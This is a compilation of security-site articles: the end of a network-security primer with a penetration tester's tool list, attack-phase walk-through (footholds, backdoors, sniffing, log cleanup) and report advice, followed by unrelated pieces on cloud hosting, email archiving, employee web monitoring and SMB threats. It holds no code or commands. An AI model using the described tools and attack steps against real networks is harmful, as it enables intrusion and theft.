Legion - This is a windows file share scanner by the erstwhile Rhino9 security group. It is fast as hell and allows you to map the drive right from in the software.

Pwdump2 - Dumps the content of the windows password sam file for loading into a password cracker.

L0phtcrack 3.0 - Cracks the passwords I get from the above or from its own internal SAM dump. It can also sniff the network for password hashes or obtain them via remote registry. I have not tried the latest version of the software, but it is very highly rated.

Netcat - This is a TCP/UDP connection backend tool, oh boy I am lost without this ! Half my scripts rely on it. There is also an encrypted version called cryptcat which might be useful if you are walking around an IDS. Netcat can do anything with a TCP or UDP connection and it serves as my replacement to telnet as well.

Hping2 - A custom packet creation utility, great for testing firewall rules among other things.

SuperScan - This is a windows based port scanner with a lot of nice options. Its fast, and has a lot of other neat little tools like NetBIOS enumeration and common tools such as whois, zone transfers etc.

Ettercap - When sniffing a switched network, a conventional network sniffer will not work. Ettercap poisons the ARP cache of the hosts you want to sniff so that they send packets to you and you can sniff them. It also allows you to inject data into connections and kill connections among other things.

Brutus - This is a fairly generic protocol brute forcing tool. It can bruteforce HTTP, FTP, Telnet and many other login authentication systems. This is a windows tool, however I prefer Hydra for linux.

Bunch of Common Exploits Effeciently Sorted

This is my collection of exploits in source and binary form. I sort them in subdirectories by operating system, then depending on how they attack - Remote / Local and then according to what they attack - BIND / SMTP / HTTP / FTP / SSH etc etc. The binary filenames are arbitrary but the source filenames instantly tell me the name of the exploit and the version of the software vulnerable.

This is essential when you're short on time and you need to 'pick one'. I don't include DoS or DDoS exploits, there is nobody I know who would authorise you to take down a production system. Don't do it -- and tell them you arent doing it.. and only if they plead with you should you do it.

Presenting Reports

This is the critical part -- it's about presenting what you found to people who probably don't understand a word of what your job is about other than you're costing them money. You have to show them that there are some security problems in your network, and this is how serious they might be.

A lot of people end the pen-test after the scanning stage. Unless someone specifically tells me to do this, I believe it is important you exploit the system to at least level 1. This is important because there is a very big difference in saying something is vulnerable and actually seeing that the vulnerability is executable. Not to mention when dealing with a corporate type, seeing 'I gained access to the server' usually gets more attention than 'the server is vulnerable to blah blah'.

After you're done, make a VERY detailed chronological report of everything you did, including which tools you used, what version they are, and anything else you did without using tools (eg. SQL injection). Give gory technical details in annexes -- make sure the main document has an executive summary and lots of pie charts that they can understand. Try and include figures and statistics for whatever you can.

To cater to the admins, provide a report for each host you tested and make sure that for every security hole you point out, you provide a link to a site with a patch or fix, . Try to provide a link to a site with detailed information about the hole preferably bugtraq or some well known source -- many admins are very interested in these things and appreciate it.

A Brief Walk-through of an Attack

This is an account of how an attacker in the real world might go about trying to exploit your system. There is no fixed way to attack a system, but a large number will follow the similar methodology or at least the chain of events.

This section assumes that the attacker is moderately skilled and moderately motivated to breaking into your network. He/She has targeted you due to a specific motive -- perhaps you sacked them, or didn't provide adequate customer support (D-link India are you listening ? ;)). Hopefully this will help you figure out where your network might be attacked, and what an attacker might do once they are on the inside.

Remember that attackers will usually choose the simplest way to get into the network. The path of least resistance principle always applies.

Reconnaissance & Footprinting

Here the attacker will try to gather as much information about your company and network as they can without making a noise. They will first use legitimate channels, such as google and your company webpage to find out as much about you as they can. They will look for the following information:

• Technical information is a goldmine, things like a webpage to help your employees log in from home will be priceless information to them. So also will newsgroup postings by your IT department asking how to set up particular software, as they now know that you use this software and perhaps they know of a vulnerability in it.

• Personal information about the company and its corporate structure. They will want information on the heads of IT departments, the CEO and other people who have a lot of power. They can use this information to forge email, or social engineer information out of subordinates.

• Information about your partners. This might be useful information for them if they know you have some sort of network connection to a supplier or partner. They can then include the supplier's systems in their attack, and find a way in to your network from there.

• General news. This can be useful information to an attacker as well. If your website says that it is going down for maintenance for some days because you are changing your web server, it might be a clue that the new setup will be in its teething stages and the admins may not have secured it fully yet.

They will also query the whois databases to find out what block of IP addresses you own. This will give them a general idea of where to start their network level scans.
After this they will start a series of network probes. The most basic of which will be to determine if you have a firewall, and what it protects. They will try and identify any systems you have that are accessible from the Internet.

The most important targets will be the ones that provide public services. These will be :

• Webservers - usually the front door into the network. All webserver software has some bugs in it, and if you're running home made CGI scripts such as login pages etc, they might be vulnerable to techniques such as SQL injection.

• Mail servers - Sendmail is very popular and most versions have at least one serious vulnerability in them. Many IT heads don't like to take down the mail server for maintenance as doing without it is very frustrating for the rest of the company (especially when the CEO doesn't get his mail).

• DNS servers - Many implementations of BIND are vulnerable to serious attacks. The DNS server can be used as a base for other attacks, such as redirecting users to other websites etc.

• Network infrastructure - Routers and switches may not have been properly secured and may have default passwords or a web administration interface running. Once controlled they can be used for anything from a simple Denial of Service attack by messing up their configurations, to channeling all your data through the attackers machine to a sniffer.

• Database servers - Many database servers have the default sa account password blank and other common misconfigurations. These are very high profile targets as the criminal might be looking to steal anything from your customer list to credit card numbers. As a rule, a database server should never be Internet facing.

The more naive of the lot (or the ones who know that security logs are never looked at) may run a commercial vulnerability scanner such as nessus or retina over the network. This will ease their work.

Exploitation Phase

After determining which are valid targets and figuring out what OS and version of software they are using (example which version of Apache or IIS is the web server running), the attacker can look for an exploit targeting that particular version. For example if they find you are running an out of date version of Sendmail, they will look for an exploit targeting that version or below.

They will first look in their collection of exploits because they have tested these. If they cannot find one, they will look to public repositories such as https://www.packetstormsecurity.nl. They will probably try to choose common exploits as these are more likely to work and they can probably test them in their own lab.

From here they have already won half the game as they are behind the firewall and can probably see a lot more of the internal network than you ever intended for them to. Many networks tend to be very hard to penetrate from the outside, but are woefully unprotected internally. This hard exterior with a mushy interior is a recipe for trouble -- an attacker who penetrates the first line of defense will have the full run of your network.

After getting in, they will also probably install backdoors on this first compromised system to provide them with many ways in, in case their original hole gets shut down. This is why when you identify a machine that was broken into, it should be built up again from scratch as there is no way of knowing what kind of backdoors might be installed. It could be tricky to find a program that runs itself from 2:00AM to 4:00AM every night and tries to connect to the attackers machine. Once they have successfully guaranteed their access, the harder part of the intrusion is usually over.

Privilege Escalation Phase

Now the attacker will attempt to increase his security clearance on the network. He/She will usually target the administrator accounts or perhaps a CEO's account. If they are focused on a specific target (say your database server) they will look for the credentials of anyone with access to that resource. They will most likely set up a network sniffer to capture all the packets as they go through the network.

They will also start manually hunting around for documents that will give them some interesting information or leverage. Thus any sensitive documents should be encrypted or stored on systems with no connection to the network. This will be the time they use to explore your internal network.

They will look for windows machines with file sharing enabled and see what they can get out of these. Chances are if they didn't come in with a particular objective in mind (for example stealing a database), they will take whatever information they deem to be useful in some way.

Clean Up Phase

Now the attacker has either found what they were looking for, or are satisfied with the level of access they have. They have made sure that they have multiple paths into the network in case you close the first hole. They will now try to cover up any trace of an intrusion. They will manually edit log files to remove entries about them and will make sure they hide any programs they have installed in hard to find places.

Remember, we are dealing with an intruder who is moderately skilled and is not just interested in defacing your website. They know that the only way to keep access will be if you never know something is amiss. In the event that there is a log they are unable to clean up, they may either take a risk leaving it there, or flood the log with bogus attacks, making it difficult for you to single out the real attack.

Where Can I Find More Information?

Without obviously plugging our site too much, the best place for answers to questions relating to this article is in our forums. The Security/Firewalls Forum is the best place to do this -- so you can ask anything from the most basic to the most advanced questions concerning network security there. A lot of common questions have already been answered in the forums, so you will quite likely find answers to questions like 'Which firewall should I use ?'.

As far as off-site resources are concerned, network security is a very vast field and there is seemingly limitless information on the subject. You will never find information at so-called hacker sites full of programs. The best way to learn about network security is to deal with the first word first -- you should be able to talk networking in and out, from packet header to checksum, layer 1 to layer 7.

Once you've got that down, you should start on the security aspect. Start by reading a lot of the papers on the net. Take in the basics first, and make sure you keep reading. Wherever possible, try to experiment with what you have read. If you don't have a home lab, you can build one 'virtually'. See the posts in the Cool Software forum about VMware.

Also, start reading the security mailing lists such as bugtraq and security-basics. Initially you may find yourself unable to understand a lot of what happens there, but the newest vulnerabilities are always announced on these lists. If you follow a vulnerability from the time its discovered to when someone posts an exploit for it, you'll get a very good idea of how the security community works.. and you'll also learn a hell of a lot in the process.

If you're serious about security, it is imperative that you learn a programming language, or at least are able to understand code if not write your own. The best choices are C and assembly language. However knowing PERL and Python are also valuable skills as you can write programs in these languages very quickly.

For now, here are a few links that you can follow for more information:

www.securityfocus.com - A very good site with all the latest news, a very good library and tools collection as well as sections dedicated to basics, intrusion detection, penetration testing etc. Also home of the Bugtraq mailing list.

www.sans.org - A site with excellent resources in its reading room, people who submit papers there are trying for a certification and as a result its mostly original material and of a very high calibre.

www.security-portal.com - A good general security site.

www.cert.org - The CERT coordination center provides updates on the latest threats and how to deal with them. Also has very good best practice tips for admins.

www.securityfocus.com/archive/1 - This is the link to Bugtraq, the best full disclosure security mailing list on the net. Here all the latest vulnerabilities get discussed way before you see them being exploited or in the press.

www.insecure.org - The mailing lists section has copies of bugtraq, full disclosure, security-basics, security-news etc etc. Also the home of nMap, the wonderful port scanner.

seclists.org - This is a direct link to the security lists section of insecure.org.

www.grc.com - For windows home users and newbies just interested in a non technical site. The site is home to Shields Up, which can test your home connection for file sharing vulnerabilities, do a port scan etc, all online. It can be a slightly melodramatic site at times though.

www.eeye.com - Home of the Retina Security Scanner. Considered the industry leader. The E-Eye team also works on a lot of the latest vulnerabilities for the windows platform.

www.nessus.org - Open source vulnerability scanner, and IMNSHO the best one going. If you're a tiger team penetration tester and you don't point nessus at a target, you're either really bad at your job or have a very large ego. If there's a vulnerability in a system, nessus will find it.

www.zonelabs.com - ZoneAlarm personal firewall for windows, considered the best, and also the market leader.

www.sygate.com - Sygate Personal Firewall, provides more configuration options than ZoneAlarm, but is consequently harder to use.

www.secinf.net - Huge selection of articles that are basically windows security related.

www.searchsecurity.com - A techtarget site which you should sign up for, very good info. Chris writes for searchnetworking.com its sister site.. I don't think the references could be much better.

www.antioffline.com - A very good library section on buffer overflows etc.

www.packetstormsecurity.nl - The largest selection of tools and exploits possible.

Conclusion

This 5-page article should serve as a simple introduction to network security. The field itself is too massive to cover in any sort of article, and the amount of cutting edge research that goes on really defies comprehension.

Some of the most intelligent minds work in the security field because it can be a very challenging and stimulating environment. If you like to think out-of-the-box and are the sort of person willing to devote large amounts of your time to reading and questioning why things happen in a particular way, security might be a decent career option for you.

Even if you're not interested in it as a career option, every admin should be aware of the threats and the solutions. Remember, you have to think like them to stop them !

If you're interested in network security, we highly recommend you read through the networking and firewall sections of this website. Going through the whole site will be some of the most enlightening time you'll ever spend online.

If you're looking for a quick fix, here are a few of the more important areas that you might want to cover:

Introduction to Networking

Introduction to Firewalls

Introduction to Network Address Translation (NAT)

Denial Of Service (DoS) Attacks

Locking down Windows networks

Introduction to Network Protocols

Also check out our downloads section where you will find lots of very good security and general networking tools.

We plan on putting up a lot of other security articles in the near future. Some will be basic and introductory like this one, while some may deal with very technical research or techniques.

As always feel free to give us feedback and constructive criticism. All flames however will be directed to /dev/null ;)

Cloud computing has gone through different stages, yet because the Internet only began to offer significant bandwidth in the 1990s, it became something for the masses over the last decade. Initial applications were known as Hosted Services. Then the term Application Service Provider emerged, with some hosted offerings known as Managed Services. More recently, in addition to these terms, Software as a Service (SaaS) became a catchphrase.  And as momentum for hosted offerings grew, SaaS is now complemented by Infrastructure as a Service, Platform as a Service, and even Hardware as a Service.

Is this a sign of some radical technology shift, or simply a bit more of what we have seen in the past? 

The answer is both. We are witnessing a great increase in global investment towards hosted offerings. These providers are expected to enjoy accelerated growth as Internet bandwidth becomes ubiquitous, faster, and less expensive; as network devices grow smaller; and as critical mass builds. Also, organizations are moving towards cloud services of all kinds through the use of different types of network devices – take, for example, the rise of smart phones, the iPad tablet, and the coming convergence of television and the Internet.

Yet, although cloud solutions may emerge as dominant winners in some emerging economies, on-premise solutions will remain in use. While start-ups and small businesses might find the cloud as the cheaper and safer option for their business – enjoying the latest technology without needing to spend money on an IT infrastructure, staff, and other expenses that come with on premise solutions; larger businesses usually stick to on-premise solutions for both philosophical and practical reasons such as wishing to retain control, and the ability to configure products for their own specific needs.

Gartner's chief security analyst, John Pescatore, for example, believes that cloud security is not enough when it comes to the upper end of the enterprise, financial institutions, and the government. On the other hand, he states that smaller businesses may actually get better security from the cloud. The reason behind this is that while the former has to protect confidential data and cannot pass it on to third parties, the latter is given better security (multiple backup locations, 24/7 monitoring, physical security protecting sites, and more).

Although the cloud might appear to be finding its fertile ground only now, especially in these times of belt-tightening, hosted services have been around for a while. For this reason, when choosing a cloud provider, always make sure you choose a company that has proven itself in the marketplace.

Yet, many organizations think twice when it comes to entrusting their data to third parties. Let's face it, almost every web user has an account on sites such as Gmail or Facebook – where personal information is saved on a separate mainframe; but when it comes to businesses allowing corporate data to go through third parties, the danger and implications are greater as an error affects a whole system, not just a single individual.

So The Question Arises: What If It Rains In The Cloud?

Some SMEs are apprehensive about using hosted services because their confidential data is being handled by third parties and because they believe the solution provider might fail. Funnily enough, it's usually the other way around. Subject to selecting a reputable provider, smaller businesses can attain better security via cloud computing as the solution provider usually invests more in security (multiple backup locations, 24/7 monitoring, physical security protecting sites, and more) than any individual small business could. Also, the second the service provider patches security vulnerability, all customers are instantly protected, as opposed to downloadable patches that the IT team within a company must apply.

And, to prevent data leaks, cloud services providers make it their aim to invest in the best technology infrastructures to protect their clients' information, knowing that even the slightest mistake can ruin their reputation – not to mention potential legal claims – and, with that, their business.

A drawback with some hosted services is that if you decide you want to delete a cloud resource, this might not result in true wiping of the data. In some cases, adequate or timely deletion might be impossible for example, because the disk that needs to be destroyed also stores data from other clients. Also, certain organizations find it difficult to entrust their confidential data to third parties.

Use Your Umbrella

Cloud computing can be the better solution for many SMEs, particularly in the case of start-ups and small businesses which cannot afford to invest in a proper IT infrastructure. The secret is to know what to look for when choosing a provider: Engage the services of a provider that will provide high availability and reliability. It would be wise to avoid cloud service providers that do not have much of a track record, and that perhaps are of limited size and profitability, subject to M&A activity, and changing development priorities.

To enjoy the full potential promised by the technology, it is important to choose a hosted service provider that has proven itself in the marketplace and that has solid ownership and management, applies stringent security measures, uses multiple data centers so as to avoid a single point of failure, provides aggressive solid service level agreement, and is committed to cloud services for the long term.

Following these suggestions, you can have a peace of mind that your data is unlikely to be subjected to ‘bad weather'!

The Reasons for Cloud-based Backup Solutions

When talking about a hosted service, we are referring to a delivery model which enables SMEs to make the most out of the latest technology through a third party. Cloud-based solutions or services are gaining in popularity as an alternative strategy for businesses , especially for startups and small businesses, particularly when considering the three reasons below:

•  Financial – Startups and very small SMEs often find it financially difficult to set up the infrastructure and IT system required when they are starting or still building the business. The additional cost to build an IT infrastructure and recruit IT personnel is at times too high and not a priority IT when they just need email and office tools. In such scenario a hosted service makes sense because the company can depend on a third party to provide additional services, such as archiving and email filtering, at a monthly cost. This reduces costs and allows the business to focus on other important areas requiring investment. As the business grows, the IT needs of that company will dictate to what extent a hosted or managed service is necessary and cost-effective.

•  Build your business – The cost saving aspect is particularly important for those businesses that require a basic IT infrastructure but it still want to benefit from security and operational efficiency without spending any money. Hosted / managed services give companies the option to test and try technologies before deciding whether they need to move their IT in-house or leave it in the hands of third parties.

•  Pay-as-you-go or rental basis – Instead of investing heavily in IT hardware, software and personnel, a pay-per-use or subscription system makes more sense. Companies choosing this delivery model would do well, however, to read contractual agreements carefully. Many vendors/providers tie in customers for two or three years, which may be just right for a startup SME, but companies should look closely at any associated costs if they decide to stop the service and at whether migrating their data will prove a very costly affair. The key to choosing a hosted or managed service is to do one's homework and plan well. Not all companies will find a cloud-based service to be suitable even if the cost structure appears to be attractive.

Are There Any Drawbacks To This System?

Despite all the advantages mentioned above, some SMEs are still apprehensive when it comes to cloud-based solutions because they are concerned about their data's security. Although an important consideration, a quality cloud-based provider will have invested heavily in security and, more often than not, in systems that are beyond what a small business can afford to implement. A good provider will have invested in multiple backup locations, 24/7 monitoring, physical security to protect sites, and more.

On the other hand, the fact that the data would be exposed to third parties and not handled internally could be seen as a drawback by some companies, especially those handling sensitive data. As stated earlier, beware of the fine print and medium- to long-term costs before committing.

Another Option

If you're a server-hugger and need to have that all-important server close to your office, businesses can always combine their on-premise solution with a hosted or managed service – benefiting from the advantages and doing away with the inherent disadvantages.

Every company is different and whether you decide to go for a cloud-based solution or not, keep in mind that there is no right or wrong – it's all a matter of what your current business's infrastructure is like and your needs at the time. However, if you are a startup or a small business, cloud-based solutions are an attractive option worth taking into consideration.

At the same time, 51% of those surveyed said they would still only use an on-premise email archiving solution.

The findings paint an interesting picture of email archiving use among SMEs. Apart from the shocking statistic that more than 63% do not archive their email, those that do, or consider doing so, are interested in the various options available.

On-premise or Hosted?

An increasing number of IT services are now offered as Software as a Service (SaaS) or hosted by a third party. Many services prove to be very cost effective when implemented at the scale which outsource service providers can manage, but there are still many admins – as the survey shows – who prefer to keep everything in house; security personnel who want to maintain data integrity internally, and business leaders who do not see the value of a cloud solution for their organization because their requirements dictate otherwise.

What is Email Archiving?

At its simplest, email archiving technology helps businesses maintain a copy of all emails sent or received from all users. This indispensible solution can be used for searches and to meet eDiscovery, compliance audits and reviews, to increase the overall long term storage capacity of the email system, and as a disaster recovery repository to ensure data availability.

Because email is so heavily tied to the internet, email archiving can readily be outsourced to service providers and can often be combined with other outsourced services like spam and malware filtering. Hosted email archiving eases the load on your IT staff, allowing them to focus on core activities, and can be a more economical solution than paying for additional servers, storage, and tape backups. It does of course require you to entrust your data to a third party, and often this is where companies may opt for an internal solution.

An internal email archiving solution, on the other hand, requires only minimal care and feeding, and offers the advantage of maintaining all data internally.

Email archiving solutions are essential for all businesses of any size, and organizations should consider the pros and cons of both hosted and on-premises email archiving, and deploy the solution which best suits their company's budget and needs.

We apologize but this paper is no longer available. Back to the Security Articles section.

Microsoft Windows machines have basic audit facilities but they fall short of fulfilling real-life business needs(i.e., monitoring Windows computers in real-time, periodically analyzing security activity, and maintaining along-term audit trail). Therefore, the need exists for a log-based intrusion detection and analysis tool such as EventsManager.

This paper explains how EventsManager’s innovative architecture can fill the gapsin Windows’ security log functionality – without hurting performance and while remaining cost-effective. Itdiscusses the use of EventsManager to implement best practice and fulfill due diligence requirementsimposed by auditors and regulatory agencies; and provides strategies for making maximum use of GFIEventsManager’s capabilities.

This white paper is no longer available by the vendor. To read similar interesting security articles, please visit our Security Articles section.

enhance employee productivity. Not wanting to create friction in the workplace many employers shy away from using what could be a significant employee productivity enhancement tool. Wasting time through Internet activities is simple and it’s a huge hidden cost to business. Just answering a few personal e-mails, checking the sports scores, reading the news headlines and checking to see how your bid is holding up can easily waste an hour of time each day. If the company has an 8 person CAD department and each of them spends an hour day on the above activities, that’s a whole employee wasted!

Employees both want and don’t want to have their Internet use restricted. The key to success in gaining productivity and employee acceptance of the problem is the perception of fairness, clear goals and self enforcement.

Why Employees Don’t Want Internet Blocking

1. They don’t know what is blocked and what is allowed. This uncertainty creates fear that they may do “something” that could hurt their advancement opportunities or worse jeopardize their job.
2. Someone ruined it for everyone and that person still works here. When everyone is punished, no one is happy. Resentment builds against the employee known to have visited inappropriate websites.
3. There’s no procedure in place for allowing an employee access to a blocked website. When an employee finds that a website they tried to access is blocked, what do they do? Certainly this indiscretion is going to show up on a report somewhere. What if they really need that site? Is there a procedure in place for allowing this person to access it?

Uncertainty is fodder for loss of morale. In today’s economic climate employees are especially sensitive to any action that can be perceived as clamping down on them. Therefore a web monitoring program must be developed that can be viewed in a positive light by all employees.

Why Employers are Afraid of Internet Blocking

• The potential of adding to IT costs and human resources headaches takes the away the value from web monitoring. The Internet is a big place and employees are smart. Employers don’t want to get into a situation where they are simply chasing their tail, trading one productivity loss by incurred costs and frustration elsewhere.

• Employers want to allow employee freedom. There is general recognition by employers that a happy employee is a loyal productive employee. Allowing certain freedoms creates a more satisfying work environment. The impact of taking that away may cause good employees to leave and an increase in turn over can be costly.

The fear of trading one cost for another or trading one headache for another has prevented many employers from implementing internet monitoring and blocking. A mistrust of IT services may also come into play.Technology got us into this situation, where up to 20% of employee time is spent on the Internet, many employers don’t trust that technology can also help them gain that productivity back. A monitoring program needs to be simple to implement and maintain.

Why Employees Want Internet Controls

• Employees are very aware of what their co-workers are doing or not doing. If an employee in the office spends an hour every day monitoring their auctions on ebay, or reading personal e-mail or chatting onIM every other employee in the office knows it and resents it. If they are working hard, everyone elseshould be too.
• Unfortunately pornographic and other offensive material finds its way into the office when the Internet is unrestricted. Exposure to this material puts the employee in a difficult situation. Do they tell the boss? Do they try to ignore it? Do they talk to the employee themselves? The employee would rather not be put into this situation.
• Employees want to work for successful, growing companies. Solid corporate policies that are seen as a necessary means to continue to propel the company forward add to employee satisfaction. Web monitoring can be one of those policies.

How Employers can Gain Employee Support for Web Monitoring

• Provide a clear, fair policy statement and expose the reasoning and goals. Keep it simple. Employees won’t read a long policy position paper. Stick to the facts and use positive language.
• Policies that make sense to staff are easy to enforce
• Policies with goals are easy to measure
• When the goal has been reached celebrate with your employees in a big way. Everyone likes to feel like part of the team.
• Empower your employees. White list, don’t black list. Let each employee actively participate in deciding which sites are allowed and which aren’t for them. Let the employee tell you what they need to be most productive and then provide it, no questions asked.
• Most job positions can be boiled down to between 5 and 20 websites. Employees know what they need. Ask them to provide a list.
• Show employees the web monitoring reports. Let them see the before and after and let them see the on-going reports. This will encourage self monitoring. This is an enforcement tool in disguise. Employees know that management can view these reports too and will take care that they make them look good.
• Send employees a weekly report on their Internet usage. They will look at and will act upon to make sure they are portrayed to management in the best light and may even compare themselves against others.

Summary

Web monitoring is good for business. The Internet as a productivity tool has wide acceptance but recent changes have brought new distractions costing business some of those productivity gains. The Internet can be controlled but needs to be done in a way that allows for employee buy-in, self monitoring and self enforcement to be successful.

Security Threats That Affect SMBs - Malicious Internet Content

Most modern small or medium-sized businesses need an Internet connection to operate. If you remove thismeans of communication, many areas of the organization will not be able to function properly or else they maybe forced to revert to old, inefficient systems. Just think how important email has become and that for manyorganizations this is the primary means of communication. Even phone communications are changing shapewith Voice over IP becoming a standard in many organizations.At some point, most organizations have been the victim of a computer virus attack.

While many may have antivirusprotection, it is not unusual for an organization of more than 10 employees to use email or the internetwithout any form of protection. Even large organizations are not spared. Recently, three hospitals in Londonhad to shut down their entire network due to an infection of a version of a worm called Mytob. Most of the timewe do not hear of small or medium-sized businesses becoming victims of such infections because it is not intheir interest to publicize these incidents. Many small or medium-sized business networks cannot afford toemploy prevention mechanisms such as network segregation.

These factors simply make it easier for a worm tospread throughout an organization.Malware is a term that includes computer viruses, worms, Trojans and any other kinds of malicious software.Employees and end users within an organization may unknowingly introduce malware on the network whenthey run malicious executable code (EXE files). Sometimes they might receive an email with an attached wormor download spyware when visiting a malicious website. Alternatively, to get work done, employees maydecide to install pirated software for which they do not have a license. This software tends to have more codethan advertised and is a common method used by malware writers to infect the end user’s computers. Anorganization that operates efficiently usually has established ways to share files and content across theorganization. These methods can also be abused by worms to further infect computer systems on the network.Computer malware does not have to be introduced manually or consciously.

Basic software packages installedon desktop computers such as Internet Explorer, Firefox, Adobe Acrobat Reader or Flash have their fair share ofsecurity vulnerabilities. These security weaknesses are actively exploited by malware writers to automaticallyinfect victim’s computers. Such attacks are known as drive-by downloads because the user does not haveknowledge of malicious files being downloaded onto his or her computer. In 2007 Google issued an alert 1describing 450,000 web pages that can install malware without the user’s consent.

Then You Get Social Engineering Attacks

This term refers to a set of techniques whereby attackers make themost of weaknesses in human nature rather than flaws within the technology. A phishing attack is a type ofsocial engineering attack that is normally opportunistic and targets a subset of society. A phishing emailmessage will typically look very familiar to the end users – it will make use of genuine logos and other visuals(from a well-known bank, for example) and will, for all intents and purposes, appear to be the genuine thing.When the end user follows the instructions in the email, he or she is directed to reveal sensitive or privateinformation such as passwords, pin codes and credit card numbers.

Employees and desktop computers are not the only target in an organization. Most small or medium-sizedcompanies need to make use of servers for email, customer relationship management and file sharing. Theseservers tend to hold critical information that can easily become a target of an attack. Additionally, the movetowards web applications has introduced a large number of new security vulnerabilities that are activelyexploited by attackers to gain access to these web applications. If these services are compromised there is ahigh risk that sensitive information can be leaked and used by cyber-criminals to commit fraud.

Attacks on Physical Systems

Internet-borne attacks are not the only security issue that organizations face. Laptops and mobiles areentrusted with the most sensitive of information about the organization. These devices, whether they arecompany property or personally owned, often contain company documents and are used to log on to thecompany network. More often than not, these mobile devices are also used during conferences and travel, thusrunning the risk of physical theft.

The number of laptops and mobile devices stolen per year is ever on theincrease. Attrition.org had over 400 articles in 20082 related to high profile data loss, many of which involvedstolen laptops and missing disks. If it happens to major hospitals and governments that have established ruleson handling such situations, why should it not happen to smaller businesses?

Another Threat Affecting Physical Security is that of Unprotected Endpoints

USB ports and DVD drives can bothbe used to leak data and introduce malware on the network. A USB stick that is mainly used for work and maycontain sensitive documents, becomes a security risk if it is taken home and left lying around and othermembers of the family use it on their home PC. While the employee may understand the sensitive nature of theinformation stored on the USB stick, the rest of the family will probably not.

They may copy files back and forthwithout considering the implications. This is typically a case of negligence but it can also be the work of atargeted attack, where internal employees can take large amounts of information out of the company.Small and medium-sized businesses may overlook the importance of securing the physical network and serverroom to prevent unauthorized persons from gaining access. Open network points and unprotected serverrooms can allow disgruntled employees and visitors to connect to the network and launch attacks such as ARP spoofing to capture network traffic with no encryption and steal passwords and content.

Authentication and Privilege Attacks

Passwords remain the number one vulnerability in many systems. It is not an easy task to have a secure systemwhereby people are required to choose a unique password that others cannot guess but is still easy for them toremember. Nowadays most people have at least five other passwords to remember, and the password used forcompany business should not be the same one used for webmail accounts, site memberships and so on. Highprofile intrusions such as the one on Twitter3 (the password was happiness), clearly show that passwords areoften the most common and universal security weakness and attacks exploiting this weakness do not require alot of technical knowledge.

Password policies can go a long way to mitigate the risk, but if the password policy is too strict people will findways and means to get around it. They will write the password on sticky notes, share them with their colleaguesor simply find a keyboard pattern (1q2w3e4r5t) that is easy to remember but also easy to guess.

Most complex password policies can be easily rendered useless by non-technological means.In small and medium-sized businesses, systems administrators are often found to be doing the work of thenetwork operators and project managers as well as security analysts. Therefore a disgruntled systemsadministrator will be a major security problem due to the amount of responsibility (and access rights) that he orshe holds. With full access privileges, a systems administrator may plan a logic bomb, backdoor accounts or leaksensitive company information that may greatly affect the stability and reputation of the organization.Additionally, in many cases the systems administrator is the person who sets the passwords for importantservices or servers. When he or she leaves the organization, these passwords may not be changed (especially ifnot documented) thus leaving a backdoor for the ex-employee.

A startup company called JournalSpace4 wascaught with no backups when their former system administrator decided to wipe out the main database. Thisproved to be disastrous for the company which ended up asking users to retrieve their content from Google’scache.The company’s management team may also have administrative privileges on their personal computers orlaptops. The reasons vary but they may want to be able to install new software or simply to have more controlof their machines. The problem with this scenario is that one compromised machine is all that an attacker needsto target an organization.

The firm itself does not need to be specifically picked out but may simply become avictim of an attack aimed at a particular vulnerable software package. Even when user accounts on the network are supposed to have reduced privileges, there may be times whereprivilege creep occurs. For example, a manager that hands over an old project to another manager may retainthe old privileges for years even after the handover!

When his or her account is compromised, the intruder alsogains access to the old project.Employees with mobile devices and laptop computers can pose a significant risk when they make use ofunsecured wireless networks whilst attending a conference or during their stay at a hotel. In many cases,inadequate or no encryption is used and anyone ‘in between’ can view and modify the network traffic. This canbe the start of an intrusion leading to compromised company accounts and networks.

Denial Of Service

In an attempt to minimize costs, or simply through negligence, most small and some medium-sized businesseshave various single points of failures. Denial of service is an attack that prevents legitimate users from makinguse of a service and it can be very hard to prevent. The means to carry out a DoS attack and the motives mayvary, but it typically leads to downtime and legitimate customers losing confidence in the organization - and itis not necessarily due to an Internet-borne incident.

In 2008 many organizations in the Mediterranean Sea basin and in the Middle East suffered Internet downtimedue to damages to the underwater Internet cables. Some of these organizations relied on a single Internetconnection, and their business was driven by Internet communications.

Having such a single point of failureproved to be very damaging for these organizations in terms of lost productivity and lost business. Reliability isa major concern for most businesses and their inability to address even one single point of failure can be costly.If an organization is not prepared for a security incident, it will probably not handle the situation appropriately.

One question that needs to be asked is: if a virus outbreak does occur, who should handle the various steps thatneed to be taken to get the systems back in shape? If an organization is simply relying on the systemsadministrator to handle such incidents, then that organization is not acknowledging that such a situation is notsimply technical in nature. It is important to be able to identify the entry point, to approach the personsconcerned and to have policies in place to prevent future occurrences - apart from simply removing the virusfrom the network! If all these tasks are left to a systems administrator, who might have to do everything ad hoc,then that is a formula for lengthy downtime.

Addressing Security Threats - An Anti-virus is not an Option

The volume of malware that can hit organizations today is enormous and the attack vectors are multiple.Viruses may spread through email, websites, USB sticks, and instant messenger programs to name but a few. Ifan organization does not have an anti-virus installed, the safety of the desktop computers will be at the mercyof the end user – and relying on the end user is not advisable or worth the risk.

Protecting desktop workstations is only one recommended practice. Once virus code is present on a desktopcomputer, it becomes a race between the virus and the anti-virus. Most malware has functionality to disableyour anti-virus software, firewalls and so on. Therefore you do not want the virus to get to your desktopcomputer in the first place!The solution is to deploy content filtering at the gateway.

Anti-virus can be part of the content filtering strategywhich can be installed at the email and web gateway. Email accounts are frequently spammed with maliciousemail attachments. These files often appear to come from legitimate contacts thus fooling the end user intorunning the malware code. Leaving the decision to the user whether or not to trust an attachment received byemail is never a good idea.

By blocking malware at the email gateway, you are greatly reducing the risk that endusers may make a mistake and open an infected file. Similarly, scanning all incoming web (HTTP) traffic formalicious code addresses a major infection vector and is a requirement when running a secure networkenvironment.

Security Awareness

A large percentage of successful attacks do not necessarily exploit technical vulnerabilities. Instead they rely onsocial engineering and people’s willingness to trust others. There are two extremes: either employees in anorganization totally mistrust each other to such an extent that the sharing of data or information is nil; or, at theother end of the scale, you have total trust between all employees.

In organizations neither approach isdesirable. There has to be an element of trust throughout an organization but checks and balances are just asimportant. Employees need to be given the opportunity to work and share data but they must also be aware ofthe security issues that arise as a result of their actions. This is why a security awareness program is soimportant.For example, malware often relies on victims to run an executable file to spread and infect a computer ornetwork.

Telling your employees not to open emails from unknown senders is not enough. They need to betold that in so doing they risk losing all their work, their passwords and other confidential details to thirdparties. They need to understand what behavior is acceptable when dealing with email and web content.Anything suspicious should be reported to someone who can handle security incidents. Having opencommunication across different departments makes for better information security, since many socialengineering attacks abuse the communication breakdowns across departments.

Additionally, it is important tokeep in mind that a positive working environment where people are happy in their job is less susceptible toinsider attacks than an oppressive workplace.

